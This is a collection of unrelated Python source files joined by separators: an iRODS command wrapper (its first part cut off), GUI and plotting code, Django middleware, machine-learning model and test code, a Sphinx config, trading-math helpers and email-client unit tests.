        :param path: the path to add metadata to (could correspond to a collection or data object)
        :param metadata: the metadata to add; values may be single items or
            lists/sets of items (each item becomes one AVU)
        """
        if len(metadata) > 0:
            type_flag = "-c" if self.is_collection(path) else "-d"
            for key, values in metadata.items():
                if not isinstance(values, List) and not isinstance(values, Set):
                    values = [values]
                # Guard against a plain string slipping through and being
                # iterated character by character.
                assert type(values) != str
                for value in values:
                    self.run_icommand(["imeta", "add", type_flag, path, key, str(value)])

    def is_collection(self, path: str) -> bool:
        """
        Checks whether the given path in iRODS is a collection.
        :param path: the path to check
        :return: whether there is a collection at the given path
        """
        listing = self.run_icommand(["ils", path])
        # `ils` output for a collection starts with "<path>:".
        return ":" in listing

    def update_checksums(self, path: str):
        """
        Forces iRODS to update the checksums of all replicas of the data object with the path given/all data objects
        in the collection given (recursive).
        :param path: the path to the data object/collection
        """
        self.run_icommand(["ichksum", "-f", "-a", "-r", path])

    def get_checksum(self, path: str) -> str:
        """
        Gets the checksum of the most recently updated replica of a data object on iRODS.
        If not stored in iRODS, the checksum will be calculated and stored as an unavoidable side-effect.
        :param path: the path to the data object
        :return: the checksum of the data object
        """
        checksum_out = self.run_icommand(["ichksum", path])
        # The checksum is the last whitespace-separated token on the first line.
        return checksum_out.split('\n')[0].rsplit(' ', 1)[-1]

    def create_replica_storage(self) -> IrodsResource:
        """
        Creates replica storage resource.
        :return: resource on which replicas can be stored
        """
        name = str(uuid4())
        location = "/tmp/%s" % name
        host = "localhost"
        # iRODS 3.x and 4.x use different `mkresc` argument forms.
        if self.get_icat_version().major == 3:
            self.run_icommand(
                ["iadmin", "mkresc", "%s" % name, "unix file system", "cache", "%s" % host, "%s" % location])
        else:
            self.run_icommand(["iadmin", "mkresc", "%s" % name, "unixfilesystem", "%s:%s" % (host, location)])
        return IrodsResource(name, host, location)

    def create_user(self, username: str, zone: str) -> IrodsUser:
        """
        Creates a user with a given username in the given zone.
        :param username: the username the user should have
        :param zone: the zone the user should be in
        :return: the created user
        """
        user = IrodsUser(username, zone, None)
        try:
            self.run_icommand(["iadmin", "mkuser", "%s#%s" % (username, zone), "rodsuser"])
        except RuntimeError as e:
            if "CATALOG_ALREADY_HAS_ITEM_BY_THAT_NAME" in e.args[0]:
                raise ValueError("A user already exists with the given username")
        return user

    def set_access(self, user_or_group: str, level: AccessLevel, path: str):
        """
        Sets the given access level for a user or group on the entity at the given path in iRODS.
        :param user_or_group: the user or group which the access level is been set for
        :param level: the access level
        :param path: the path of the entity
        """
        self.run_icommand(["ichmod", level.value, user_or_group, path])

    def get_icat_version(self) -> Version:
        """
        Gets the version of iCAT server being used.
        :return: the version of iCAT server
        """
        ienv_out = self.run_icommand(["ienv"])
        # The version string appears in the `ienv` output as "rods<version>,".
        version_as_string = re.search("rods(.*),", ienv_out).group(1)
        return Version(version_as_string)

    def run_icommand(self, arguments: Union[str, List[str]], deprecated_arguments: List[str]=None) -> str:
        """
        Executes the given icommand binary with any arguments, returning the stdout as a string and raising an
        exception if stderr is written to.

        NOTE(review): when given a list, this method mutates the caller's list
        in place (replaces element 0 with the binary's full path and may
        extend it) — pass a copy if you reuse the list.
        :param arguments: the binary to execute (must be icommand binary with no path, e.g. ["ils", args]) and arguments
        :param deprecated_arguments: (deprecated - pass after binary in list given in first argument) command arguments
        :return: the output written to stdout by the icommand that was executed
        """
        if isinstance(arguments, str):
            logging.warning("Use of a string denoting the icommand binary with an optional list of arguments is "
                            "depreciated - combine both in a single list, given as the first argument")
            arguments = [arguments]
            if deprecated_arguments is not None:
                arguments += deprecated_arguments
        binary_path = os.path.join(self.icommands_location, arguments[0])
        arguments[0] = binary_path
        process = subprocess.Popen(arguments, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        out, error = process.communicate()
        logging.debug("icommand output: %s" % out)
        # Any stderr output is treated as failure.
        if len(error) != 0:
            raise RuntimeError("%s:\nError: %s\nOutput: %s" % (arguments, error, out))
        return out.decode("utf-8").rstrip()
|
from fc_2014_10_06 import multiply
def test_numbers_3_4():
    """Check that multiply(3, 4) yields the expected product."""
    expected_product = 12
    assert multiply(3, 4) == expected_product
|
from PyQt4 import uic
from PyQt4 import QtGui, QtCore
import pyqtgraph as pg
import os
import numpy as np
from ipbec.clt.imtools import getROISlice
curr_dir = os.path.dirname(os.path.abspath(__file__))
ui_file = os.path.join(curr_dir, "sterngerlach.ui")
Ui_PluginDialog, QDialog = uic.loadUiType(ui_file)
class PluginDialog(QDialog):
    """Handles the plugin dialogbox.

    Shows a vertical-ROI profile plot of a division image together with six
    movable marker lines, lets the user set a per-image offset/spacing via a
    table, and saves the resulting five spin-state populations to a text file.
    """
    name = "Stern Gerlach V"
    def __init__(self, settings, data_dict):
        """Build the dialog UI from `settings` (QSettings) and `data_dict`.

        `data_dict` is expected to provide 'ref_images', 'div_images' and
        'roi_v' entries — TODO confirm against the caller.
        """
        super(PluginDialog, self).__init__()
        self.settings = settings
        self.data_dict = data_dict
        # NOTE(review): reads 'ref_images' into a variable named `div_images`
        # and uses its length as the image count — confirm this is intended
        # rather than a copy/paste slip of 'div_images'.
        div_images = self.data_dict['ref_images']
        self.n_images = len(div_images)
        div_image_1 = self.data_dict['div_images'][0]
        roi_v = self.data_dict['roi_v']
        indices, data = getROISlice(div_image_1, roi_v)
        # Length of a ROI slice: upper bound for the offset/spacing spin boxes.
        self.max_length = len(data)
        # Restore the last-used save folder from the persisted settings.
        self.settings.beginGroup('savedialog')
        self.save_folder = str(self.settings.value('save_folder', './').toString())
        self.settings.endGroup()
        self.grid = QtGui.QGridLayout(self)
        self.setLayout(self.grid)
        self.roiv_plot = pg.PlotWidget(title='ROI V', parent=self)
        self.grid.addWidget(self.roiv_plot, 0, 0, 1, 4)
        self.pData = self.roiv_plot.plot()  # to plot the data
        self.pData.setPen((255, 255, 255))
        # Six red vertical marker lines delimiting the five population regions.
        self.div_pens = [self.roiv_plot.plot() for i in range(6)]
        for dp in self.div_pens:
            dp.setPen((255, 0, 0))
        self.offsetSpinBox = QtGui.QSpinBox(self)
        self.offsetSpinBox.setMaximum(self.max_length)
        self.offsetSpinBox.setValue(1)
        self.spacingSpinBox = QtGui.QSpinBox(self)
        self.spacingSpinBox.setMaximum(self.max_length)
        self.spacingSpinBox.setValue(1)
        self.resetButton = QtGui.QPushButton("Reset", self)
        self.resetButton.clicked.connect(self.handleReset)
        self.saveButton = QtGui.QPushButton("Save", self)
        self.saveButton.clicked.connect(self.handleSave)
        self.offsetLabel = QtGui.QLabel("Offset")
        self.widthLabel = QtGui.QLabel("Width")
        self.allLabel = QtGui.QLabel("All")
        # One row per image, columns: offset and spacing.
        self.tableWidget = QtGui.QTableWidget(self.n_images, 2, self)
        self.tableWidget.currentCellChanged.connect(self.handleCurrentCellChanged)
        self.tableWidget.cellChanged.connect(self.handleCellChanged)
        self.grid.addWidget(self.offsetLabel, 1, 1)
        self.grid.addWidget(self.widthLabel, 1, 2)
        self.grid.addWidget(self.allLabel, 2, 0)
        self.grid.addWidget(self.offsetSpinBox, 2, 1)
        self.grid.addWidget(self.spacingSpinBox, 2, 2)
        self.grid.addWidget(self.resetButton, 2, 3)
        self.grid.addWidget(self.saveButton, 3, 3)
        self.grid.addWidget(self.tableWidget, 3, 1, 1, 2)
        self.handleReset()
    def handleReset(self):
        """Fill every table row with the global offset/spacing values.

        Signals are disconnected while the table is rewritten so the per-cell
        handler does not fire once per populated cell, then reconnected.
        """
        self.tableWidget.currentCellChanged.disconnect(self.handleCurrentCellChanged)
        self.tableWidget.cellChanged.disconnect(self.handleCellChanged)
        offset = self.offsetSpinBox.value()
        spacing = self.spacingSpinBox.value()
        for i in range(self.n_images):
            self.tableWidget.setItem(i, 0,
                                     QtGui.QTableWidgetItem(str(offset)))
            self.tableWidget.setItem(i, 1,
                                     QtGui.QTableWidgetItem(str(spacing)))
        self.tableWidget.currentCellChanged.connect(self.handleCurrentCellChanged)
        self.tableWidget.cellChanged.connect(self.handleCellChanged)
        # Refresh the plot for the first image.
        self.handleCellChanged(0, 0)
    def handleCurrentCellChanged(self, row, col, prev_row, prev_col):
        """Delegate selection changes to the cell-changed handler."""
        self.handleCellChanged(row, col)
    def handleCellChanged(self, row, col):
        """Re-plot the profile of image `row` with its table offset/spacing."""
        div_image = self.data_dict['div_images'][row]
        roi_v = self.data_dict['roi_v']
        indices, data = getROISlice(div_image, roi_v)
        offset = int(self.tableWidget.item(row, 0).text())
        spacing = int(self.tableWidget.item(row, 1).text())
        self.plotProfile(data, offset, spacing)
    def plotProfile(self, data, offset, spacing):
        """Plot the slice data and the six equally-spaced marker lines."""
        x_indices = np.arange(len(data))
        max_val = np.max(data)
        self.pData.setData(x=x_indices, y=data)
        for i, dp in enumerate(self.div_pens):
            xval = offset + i*spacing
            dp.setData([xval, xval], [0, max_val])
    def handleSave(self):
        """Compute populations for every image and save them as a TSV file."""
        offsets = [int(self.tableWidget.item(i, 0).text())
                   for i in range(self.n_images)]
        spacings = [int(self.tableWidget.item(i, 1).text())
                    for i in range(self.n_images)]
        div_images = self.data_dict['div_images']
        roi_v = self.data_dict['roi_v']
        data_slices = [getROISlice(di, roi_v)[1] for di in div_images]
        populations = np.array([self.getPopulations(ds, off, spa)
                                for (ds, off, spa) in zip(data_slices,
                                                          offsets,
                                                          spacings)])
        save_dialog = QtGui.QFileDialog.getSaveFileName
        file_name = str(save_dialog(self, caption='Save as...',
                                    directory=self.save_folder))
        if file_name != '':
            header_string = 'mF=-2\t mF=-1\tmF=0\t mF=1\tmF=2'
            np.savetxt(file_name, populations, delimiter='\t',
                       header=header_string)
    def getPopulations(self, data_slice, offset, spacing):
        """Return the five normalized populations summed between markers."""
        pops = np.array([np.sum(data_slice[(offset+i*spacing):(offset+(i+1)*spacing)])
                         for i in range(5)])
        return pops/np.sum(pops)
|
import _plotly_utils.basevalidators
class YValidator(_plotly_utils.basevalidators.NumberValidator):
    """Number validator for the `y` property of `contour.colorbar`."""

    def __init__(self, plotly_name="y", parent_name="contour.colorbar", **kwargs):
        # Apply the defaults only for options the caller did not override.
        kwargs.setdefault("edit_type", "colorbars")
        kwargs.setdefault("max", 3)
        kwargs.setdefault("min", -2)
        kwargs.setdefault("role", "style")
        super(YValidator, self).__init__(
            plotly_name=plotly_name, parent_name=parent_name, **kwargs
        )
|
import smtplib
import config
from email.mime.text import MIMEText
from time import sleep
SLEEP_TIME = config.SLEEP_TIME
VALID_MESSAGE_HEADERS = ["To", "From", "Subject", "Cc"]
VALID_MESSAGE_FIELDS = VALID_MESSAGE_HEADERS + ["Bcc", "Body"]
def validateFields(fields):
    '''Require that every supplied field name is legitimate.

    Returns a dictionary covering all valid message fields, where any
    field missing from the input is set to the empty string.
    '''
    for field_name in fields:
        assert field_name in VALID_MESSAGE_FIELDS, \
            "Message field {} is invalid".format(field_name)
    return {field_name: (fields[field_name] if field_name in fields else "")
            for field_name in VALID_MESSAGE_FIELDS}
def addressList(st):
    '''Split a string of comma-separated items into a list.

    Whitespace around each item is stripped; blank entries (empty or
    whitespace-only) are dropped.
    '''
    stripped_entries = (piece.strip() for piece in st.split(","))
    return [piece for piece in stripped_entries if piece != ""]
class Message:
    """An outgoing email: envelope sender/recipients plus the MIME text."""
    def __init__(self, headers, body):
        """Build the message from a mapping of header fields and a body string."""
        # Validate header names and fill any missing field with "".
        fields = validateFields(headers)
        # Envelope recipients include Bcc, even though the Bcc header itself
        # is never written into the message text below (only headers in
        # VALID_MESSAGE_HEADERS are) — this keeps Bcc recipients hidden.
        self.to_envelope = addressList(fields["To"])+addressList(fields["Bcc"])+addressList(fields["Cc"])
        self.from_envelope = fields["From"]
        msg = MIMEText(body)
        for f in VALID_MESSAGE_HEADERS:
            msg[f] = fields[f]
        self.msg_string = msg.as_string()
    def __str__(self):
        # Debug-friendly dump of the envelope plus the full message text.
        return str("\nMESSAGE##############\nRECIPIENTS: "+ str(self.to_envelope) + "\nENV_FROM: "+ self.from_envelope + "\n" + self.msg_string + "\n")
    def __repr__(self):
        return str(self)
    def send(self, connection):
        """Send the message over an open smtplib connection, then pause.

        The sleep throttles successive sends (rate limiting via config).
        """
        connection.sendmail(self.from_envelope, self.to_envelope, self.msg_string)
        sleep(SLEEP_TIME)
|
from __future__ import unicode_literals
from pybooru import Pybooru
client = Pybooru('Konachan', username='your-username', password='your-password')
# Fix: the original passed `post_id=id`, i.e. the Python builtin function `id`,
# instead of an actual post identifier.
post_id = 1  # replace with the id of the post to comment on
client.comments_create(post_id=post_id, comment_body='Comment content')
|
import sequencing_np as snp
import tensorflow as tf
from sequencing import MODE, TIME_MAJOR
from sequencing.encoders.rnn_encoder import StackBidirectionalRNNEncoder
from sequencing_np import np, DTYPE
def stack_bidir_rnn_encoder(rnn_cell, name=None):
    """Check the numpy StackBidirectionalRNNEncoder against TensorFlow's.

    Builds a TF encoder with random inputs, copies the trained-variable
    values into the numpy implementation, and asserts all four encoder
    outputs match to almost-equal precision.

    :param rnn_cell: cell class name, e.g. 'BasicRNNCell', 'GRUCell',
        'BasicLSTMCell'
    :param name: optional scope name shared by both encoders
    """
    # Small, fixed problem sizes so the comparison runs quickly.
    time_steps = 4
    hidden_units = 32
    batch_size = 6
    num_layers = 7
    input_size = 8
    attention_size = 9
    time_major = TIME_MAJOR
    params = {'rnn_cell': {'state_size': hidden_units,
                           'cell_name': rnn_cell,
                           'num_layers': num_layers,
                           'input_keep_prob': 1.0,
                           'output_keep_prob': 1.0},
              'attention_key_size': attention_size}
    encoder = StackBidirectionalRNNEncoder(params, mode=MODE.INFER, name=name)
    # inputs to encoder: shape depends on whether the library is time-major
    if time_major:
        inputs = np.asarray(np.random.rand(time_steps, batch_size, input_size),
                            dtype=DTYPE)
        sequence_length = np.random.randint(1, time_steps + 1, batch_size)
    else:
        inputs = np.asarray(np.random.rand(batch_size, time_steps, input_size),
                            dtype=DTYPE)
        sequence_length = np.random.randint(1, time_steps + 1, batch_size)
    output = encoder.encode(tf.convert_to_tensor(inputs), sequence_length)
    # get outputs of tensorflow, and capture the variable values so the
    # numpy encoder can be initialized with identical weights
    init = tf.global_variables_initializer()
    train_vars = tf.trainable_variables()
    with tf.Session() as sess:
        sess.run(init)
        train_vars_vals = sess.run(train_vars)
        # Map variable name (without the ':0' suffix) -> value.
        dict_var_vals = {k.name.split(':')[0]: v for k, v in zip(train_vars,
                                                                 train_vars_vals)}
        output_tf = sess.run([output[0], output[1], output[2], output[3]])
    # Zero initial states: two per layer (forward and backward); LSTM cells
    # need a (c, h) pair per direction instead of a single array.
    init_states = []
    for i in range(num_layers):
        if rnn_cell != 'BasicLSTMCell':
            init_states.append(np.zeros((batch_size, hidden_units),
                                        dtype=DTYPE))
            init_states.append(np.zeros((batch_size, hidden_units),
                                        dtype=DTYPE))
        else:
            init_states.append(
                (np.zeros((batch_size, hidden_units), dtype=DTYPE),) * 2)
            init_states.append(
                (np.zeros((batch_size, hidden_units), dtype=DTYPE),) * 2)
    encoder_np = snp.StackBidirectionalRNNEncoder(params, init_states, name)
    graph = snp.Graph()
    graph.initialize(dict_var_vals)
    output_np = encoder_np.encode(inputs, sequence_length)
    # All four outputs (outputs, final states, attention keys/values) agree.
    np.testing.assert_array_almost_equal(output_np[0], output_tf[0])
    np.testing.assert_array_almost_equal(output_np[1], output_tf[1])
    np.testing.assert_array_almost_equal(output_np[2], output_tf[2])
    np.testing.assert_array_almost_equal(output_np[3], output_tf[3])
def test_stack_bidir_rnn_encoder_rnn():
    """Run the encoder comparison with basic RNN cells."""
    # Clear global layer state before and after so tests don't interfere.
    graph = snp.Graph()
    graph.clear_layers()
    stack_bidir_rnn_encoder('BasicRNNCell', 'rnn')
    graph.clear_layers()
def test_stack_bidir_rnn_encoder_gru():
    """Run the encoder comparison with GRU cells (default scope name)."""
    graph = snp.Graph()
    graph.clear_layers()
    stack_bidir_rnn_encoder('GRUCell')
    graph.clear_layers()
def test_stack_bidir_rnn_encoder_lstm():
    """Run the encoder comparison with LSTM cells."""
    graph = snp.Graph()
    graph.clear_layers()
    stack_bidir_rnn_encoder('BasicLSTMCell', 'bir_lstm')
    graph.clear_layers()
# Allow running the three encoder comparisons directly, outside a test runner.
if __name__ == '__main__':
    test_stack_bidir_rnn_encoder_rnn()
    test_stack_bidir_rnn_encoder_gru()
    test_stack_bidir_rnn_encoder_lstm()
|
from pkgutil import extend_path
# Declare this package as a (legacy, setuptools-style) namespace package so
# its sub-packages may be split across multiple directories on sys.path.
__path__ = extend_path(__path__, __name__)
__import__('pkg_resources').declare_namespace(__name__)
|
from django.contrib.auth.models import AnonymousUser
from .auth import ApiToken
class BettyApiKeyMiddleware(object):
    """Authenticates requests carrying an `X-Betty-Api-Key` header.

    On a matching token the request user is the token's user; on an unknown
    token the request user is anonymous; without the header the request is
    left untouched.
    """

    def process_request(self, request):
        # Guard clause: nothing to do when the API-key header is absent.
        if "HTTP_X_BETTY_API_KEY" not in request.META:
            return
        api_key = request.META["HTTP_X_BETTY_API_KEY"]
        try:
            token = ApiToken.objects.get(public_token=api_key)
        except ApiToken.DoesNotExist:
            request.user = AnonymousUser()
        else:
            request.user = token.get_user()
|
from typing import Dict, List, Optional, Tuple, Union
import tensorflow as tf
from odin.bay.vi.autoencoder.beta_vae import BetaVAE
from odin.bay.vi.losses import disentangled_inferred_prior_loss
from odin.utils import as_tuple
class DIPVAE(BetaVAE):
  """ Implementation of disentangled inferred prior VAE
  Parameters
  ----------
  only_mean : A Boolean. If `True`, applying DIP constraint only on the
      mean of latents `Cov[E(z)]` (i.e. type 'i'), otherwise,
      `E[Cov(z)] + Cov[E(z)]` (i.e. type 'ii')
  lambda_offdiag : A Scalar. Weight for penalizing the off-diagonal part of
      covariance matrix.
  lambda_diag : A Scalar.
      Weight for penalizing the diagonal.
  References
  ----------
  Kumar, A., Sattigeri, P., Balakrishnan, A., 2018. "Variational Inference
  of Disentangled Latent Concepts from Unlabeled Observations".
  arXiv:1711.00848 [cs, stat].
  """
  def __init__(self,
               only_mean: bool = False,
               lambda_diag: float = 1.0,
               lambda_offdiag: float = 2.0,
               beta: float = 1.0,
               **kwargs):
    super().__init__(beta=beta, **kwargs)
    self.only_mean = bool(only_mean)
    # Store the penalty weights as tensors in the model dtype so they can be
    # used directly in the loss computation.
    self.lambda_diag = tf.convert_to_tensor(lambda_diag,
                                            dtype=self.dtype,
                                            name='lambda_diag')
    self.lambda_offdiag = tf.convert_to_tensor(lambda_offdiag,
                                               dtype=self.dtype,
                                               name='lambda_offdiag')
  def elbo_components(self, inputs, training=None, mask=None):
    """Return the beta-VAE ELBO components with one extra DIP penalty per
    latent distribution, added to the KL dictionary under `dip_<latent name>`.
    """
    llk, kl = super().elbo_components(inputs, mask=mask, training=training)
    px_z, qz_x = self.last_outputs
    # One DIP regularizer per latent (models may have several latent groups).
    for z, qz in zip(as_tuple(self.latents), as_tuple(qz_x)):
      dip = disentangled_inferred_prior_loss(qz,
                                             only_mean=self.only_mean,
                                             lambda_offdiag=self.lambda_offdiag,
                                             lambda_diag=self.lambda_diag)
      kl[f'dip_{z.name}'] = dip
    return llk, kl
|
# Sphinx configuration for the srcgen documentation.
import sys, os
# Make the package importable from the docs directory.
sys.path.insert(0, "..")
# -- General configuration ---------------------------------------------------
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = u'srcgen'
copyright = u'2013, Tomer Filiba'
# Version/release are taken from the package itself, keeping docs in sync.
from srcgen.version import version_string
version = version_string
release = version_string
exclude_patterns = ['_build']
pygments_style = 'sphinx'
# -- HTML output -------------------------------------------------------------
html_theme = 'haiku'
html_theme_options = {"full_logo" : True}
html_title = "srcgen"
html_logo = "_static/logo.png"
html_static_path = ['_static']
htmlhelp_basename = 'srcgendoc'
# -- LaTeX / man / Texinfo output --------------------------------------------
latex_elements = {
}
latex_documents = [
    ('index', 'srcgen.tex', u'srcgen Documentation',
     u'Tomer Filiba', 'manual'),
]
man_pages = [
    ('index', 'srcgen', u'srcgen Documentation',
     [u'Tomer Filiba'], 1)
]
texinfo_documents = [
    ('index', 'srcgen', u'srcgen Documentation',
     u'Tomer Filiba', 'srcgen', 'One line description of project.',
     'Miscellaneous'),
]
|
def get_stop_loss_price(price, stop, relative_stop=False):
    """Return the stop loss price calculated from the given stop.

    The stop can be given either in absolute values (default) or in
    values relative to the current price.
    Please note that the stop must be positive for BUY orders and
    negative for SELL orders.
    :price: Current price you want to buy/sell.
    :stop: Stop price.
    :relative_stop: Flag that the stop is interpreted as relative value
                    and not as absolute value.
    :returns: Price where to set the stop loss
    """
    return price - stop if relative_stop else abs(stop)
def get_risk_per_unit(price, sl_price):
    """Return the risk per unit: the absolute difference between the
    current price and the stop loss price.

    Example:
    If the current price of the unit is 10$ and your stop loss price is
    set to 9$ the risk per unit is 1$
    :price: Current price you want to buy/sell.
    :sl_price: Stop loss price.
    :returns: Amount the buy/sell price can raise/fall per unit.
    """
    difference = price - sl_price
    return abs(difference)
def get_position_size(insert, risk_per_unit):
    """Return the number of units you can buy with the given insert at
    the given risk.

    Example:
    If you have a max insert of 10$ which you can afford to loose and
    the risk per unit (calculated from the current unit price and its
    stop loss price) is 1$ you can buy 10 units.
    :insert: Max amount of money you set at risk to loose.
    :risk_per_unit: Amount the buy/sell price can raise/fall per unit.
    :returns: Number of units you can buy.
    """
    units = insert / risk_per_unit
    return units
def get_position_value(price, size):
    """Return the value of your position.

    This is the amount of money you must put into a BUY order, or which
    you get when doing a SELL order.
    :price: Current price you want to buy/sell.
    :size: How many do you want to buy/sell
    :returns: Value of your position.
    """
    value = size * price
    return value
|
# Python 2 CGI response: header line, blank separator, then the body.
print "Content-Type: text/plain"
print ""
# NOTE(review): a <script> tag is emitted inside a text/plain response, so
# browsers will render it as text rather than execute it — confirm the
# intended Content-Type (text/html?).
print "<script src='//connect.facebook.net/en_US/sdk.js'></script>"
|
from mock import Mock, MagicMock
import unittest2 as unittest
from contextlib import contextmanager
from monocle.callback import defer
from helpers import mock_db, listen_for, mock_worker
def _account_for_test(config=None, db=None):
    """Build a tinymail Account with throwaway defaults for testing."""
    from tinymail.account import Account
    default_config = {
        'name': 'my test account',
        'host': 'test_host',
        'login_name': 'test_username',
        'login_pass': 'test_password',
    }
    chosen_config = default_config if config is None else config
    chosen_db = MagicMock() if db is None else db
    return Account(chosen_config, chosen_db)
# Sample IMAP message fixtures shared by the tests: (uid, flags, raw headers).
msg13_data = (13, set([r'\Seen']), "Subject: test message")
msg22_data = (22, set([]), "Subject: read me")
class AccountTest(unittest.TestCase):
    """Basic accessors on Account: listing and fetching folders."""
    def test_list_folders(self):
        account = _account_for_test()
        fol1, fol2 = Mock(), Mock()
        account._folders = {'fol1': fol1, 'fol2': fol2}
        folders = list(account.list_folders())
        self.assertEqual(folders, [fol1, fol2])
    def test_get_folder(self):
        account = _account_for_test()
        fol1, fol2 = Mock(), Mock()
        account._folders = {'fol1': fol1, 'fol2': fol2}
        ret_fol1 = account.get_folder('fol1')
        self.assertTrue(ret_fol1 is fol1)
class FolderTest(unittest.TestCase):
    """Basic accessors on Folder: listing and fetching messages by uid."""
    def test_list_messages(self):
        from tinymail.account import Folder
        folder = Folder(Mock(), 'fol1')
        msg1, msg2 = Mock(), Mock()
        folder._messages = {1: msg1, 2: msg2}
        messages = list(folder.list_messages())
        self.assertEqual(messages, [msg1, msg2])
    def test_get_message(self):
        from tinymail.account import Folder
        folder = Folder(Mock(), 'fol1')
        msg1, msg2 = Mock(), Mock()
        folder._messages = {1: msg1, 2: msg2}
        self.assertEqual(folder.get_message(1), msg1)
        self.assertEqual(folder.get_message(2), msg2)
class AccountUpdateTest(unittest.TestCase):
    """Behaviour of Account.perform_update against a mocked IMAP worker:
    folder/message synchronization, emitted signals, and mailbox cleanup."""
    def test_list_folders(self):
        # A first update discovers the server's folders and fires
        # `account_updated` once.
        from tinymail.account import account_updated
        account = _account_for_test()
        folders = {'fol1': {}, 'fol2': {}}
        with mock_worker(**folders):
            with listen_for(account_updated) as caught_signals:
                account.perform_update()
        self.assertEqual(set(f.name for f in account.list_folders()),
                         set(folders))
        self.assertEqual(caught_signals, [(account, {})])
    def test_list_messages(self):
        # A new message on the server shows up locally and is reported in
        # the `folder_updated` signal's 'added' list.
        from tinymail.account import folder_updated
        account = _account_for_test()
        with mock_worker(fol1={6: None}):
            account.perform_update()
        with mock_worker(fol1={6: None, 8: None}):
            with listen_for(folder_updated) as caught_signals:
                account.perform_update()
        fol1 = account.get_folder('fol1')
        self.assertEqual(set(m.uid for m in fol1.list_messages()),
                         set([6, 8]))
        event_data = {'added': [8], 'removed': [], 'flags_changed': []}
        self.assertEqual(caught_signals, [(fol1, event_data)])
    def test_message_removed_on_server(self):
        # A message deleted server-side disappears locally and is reported
        # in the 'removed' list.
        from tinymail.account import folder_updated
        account = _account_for_test()
        with mock_worker(fol1={6: None, 8: None}):
            account.perform_update()
        with mock_worker(fol1={6: None}):
            with listen_for(folder_updated) as caught_signals:
                account.perform_update()
        fol1 = account.get_folder('fol1')
        self.assertEqual([m.uid for m in fol1.list_messages()], [6])
        event_data = {'added': [], 'removed': [8], 'flags_changed': []}
        self.assertEqual(caught_signals, [(fol1, event_data)])
    def test_only_get_new_headers(self):
        # Headers are fetched only for uids not already known locally.
        account = _account_for_test()
        with mock_worker(fol1={6: None, 8: None}):
            account.perform_update()
        with mock_worker(fol1={6: None, 8: None, 13: None}) as worker:
            account.perform_update()
        worker.get_message_headers.assert_called_once_with(set([13]))
    def test_empty_folder(self):
        # No header fetch should happen at all for an empty folder.
        account = _account_for_test()
        with mock_worker(fol1={}) as worker:
            account.perform_update()
        self.assertFalse(worker.get_message_headers.called)
    def test_load_full_message(self):
        # Loading the full body fires `message_updated` and closes the
        # mailbox afterwards.
        from tinymail.account import message_updated
        account = _account_for_test()
        mime_message = "Subject: hi\r\n\r\nHello world!"
        with mock_worker(fol1={6: None}) as worker:
            account.perform_update()
            message = account.get_folder('fol1')._messages[6]
            worker.get_message_body.return_value = defer(mime_message)
            worker.close_mailbox.reset_mock()
            with listen_for(message_updated) as caught_signals:
                message.load_full()
        self.assertEqual(message.raw_full, mime_message)
        self.assertEqual(caught_signals, [(message, {})])
        worker.close_mailbox.assert_called_once_with()
    def test_folder_removed_on_server(self):
        # Folders that vanish server-side are dropped locally.
        account = _account_for_test()
        with mock_worker(fol1={}, fol2={}):
            account.perform_update()
        with mock_worker(fol1={}):
            account.perform_update()
        self.assertEqual([f.name for f in account.list_folders()], ['fol1'])
    def test_trust_uidvalidity(self):
        # Same UIDVALIDITY: cached headers are trusted, not re-fetched.
        account = _account_for_test()
        msg13_bis_data = (13, set([r'\Seen']), "Subject: another message")
        with mock_worker(fol1={13: msg13_data}):
            account.perform_update()
        with mock_worker(fol1={13: msg13_bis_data}):
            account.perform_update()
        fol1 = account.get_folder('fol1')
        self.assertEqual([m.raw_headers for m in fol1.list_messages()],
                         [msg13_data[2]])
    def test_uidvalidity_changed(self):
        # Changed UIDVALIDITY invalidates the cache: headers are re-fetched.
        account = _account_for_test()
        msg13_bis_data = (13, set([r'\Seen']), "Subject: another message")
        with mock_worker(fol1={13: msg13_data, 'UIDVALIDITY': 1234}):
            account.perform_update()
        with mock_worker(fol1={13: msg13_bis_data, 'UIDVALIDITY': 1239}):
            account.perform_update()
        fol1 = account.get_folder('fol1')
        self.assertEqual([m.raw_headers for m in fol1.list_messages()],
                         [msg13_bis_data[2]])
    def test_message_flags_changed(self):
        # Server-side flag changes are mirrored locally and reported in
        # the 'flags_changed' list.
        from tinymail.account import folder_updated
        account = _account_for_test()
        msg13_bis_data = (13, set([r'\Flagged']), "Subject: test message")
        with mock_worker(fol1={13: msg13_data}):
            account.perform_update()
        with mock_worker(fol1={13: msg13_bis_data}):
            with listen_for(folder_updated) as caught_signals:
                account.perform_update()
        fol1 = account.get_folder('fol1')
        self.assertEqual([m.flags for m in fol1.list_messages()],
                         [set(['\\Flagged'])])
        event_data = {'added': [], 'removed': [], 'flags_changed': [13]}
        self.assertEqual(caught_signals, [(fol1, event_data)])
    def test_close_mailbox_after_update(self):
        account = _account_for_test()
        with mock_worker(fol1={}) as worker:
            account.perform_update()
        worker.close_mailbox.assert_called_once_with()
class PersistenceTest(unittest.TestCase):
    """Account state survives a restart: a second Account built on the same
    db must see the folders, messages, flags and uidvalidity persisted by
    the first one."""
    def test_folders(self):
        db = mock_db()
        account = _account_for_test(db=db)
        with mock_worker(myfolder={}) as worker:
            account.perform_update()
        account2 = _account_for_test(db=db)
        folders = list(account2.list_folders())
        self.assertEqual(len(folders), 1)
        self.assertEqual(folders[0].name, 'myfolder')
    def test_folders_removed(self):
        db = mock_db()
        account = _account_for_test(db=db)
        with mock_worker(fol1={}, fol2={}):
            account.perform_update()
        with mock_worker(fol1={}):
            account.perform_update()
        account2 = _account_for_test(db=db)
        self.assertEqual([f.name for f in account2.list_folders()], ['fol1'])
    def test_messages(self):
        # uid, flags and raw headers all round-trip through the database.
        db = mock_db()
        account = _account_for_test(db=db)
        msg4_data = (4, set([r'\Seen']), "Subject: test message")
        msg22_data = (22, set([r'\Seen', r'\Answered']), "Subject: blah")
        with mock_worker(myfolder={4: msg4_data, 22: msg22_data}) as worker:
            account.perform_update()
        account2 = _account_for_test(db=db)
        myfolder = account2.get_folder('myfolder')
        messages = list(myfolder.list_messages())
        messages.sort(key=lambda m: m.uid)
        self.assertEqual(len(messages), 2)
        msg4, msg22 = messages
        self.assertEqual(msg4.uid, 4)
        self.assertEqual(msg4.flags, set([r'\Seen']))
        self.assertEqual(msg4.raw_headers, "Subject: test message")
        self.assertEqual(msg22.uid, 22)
        self.assertEqual(msg22.flags, set([r'\Seen', r'\Answered']))
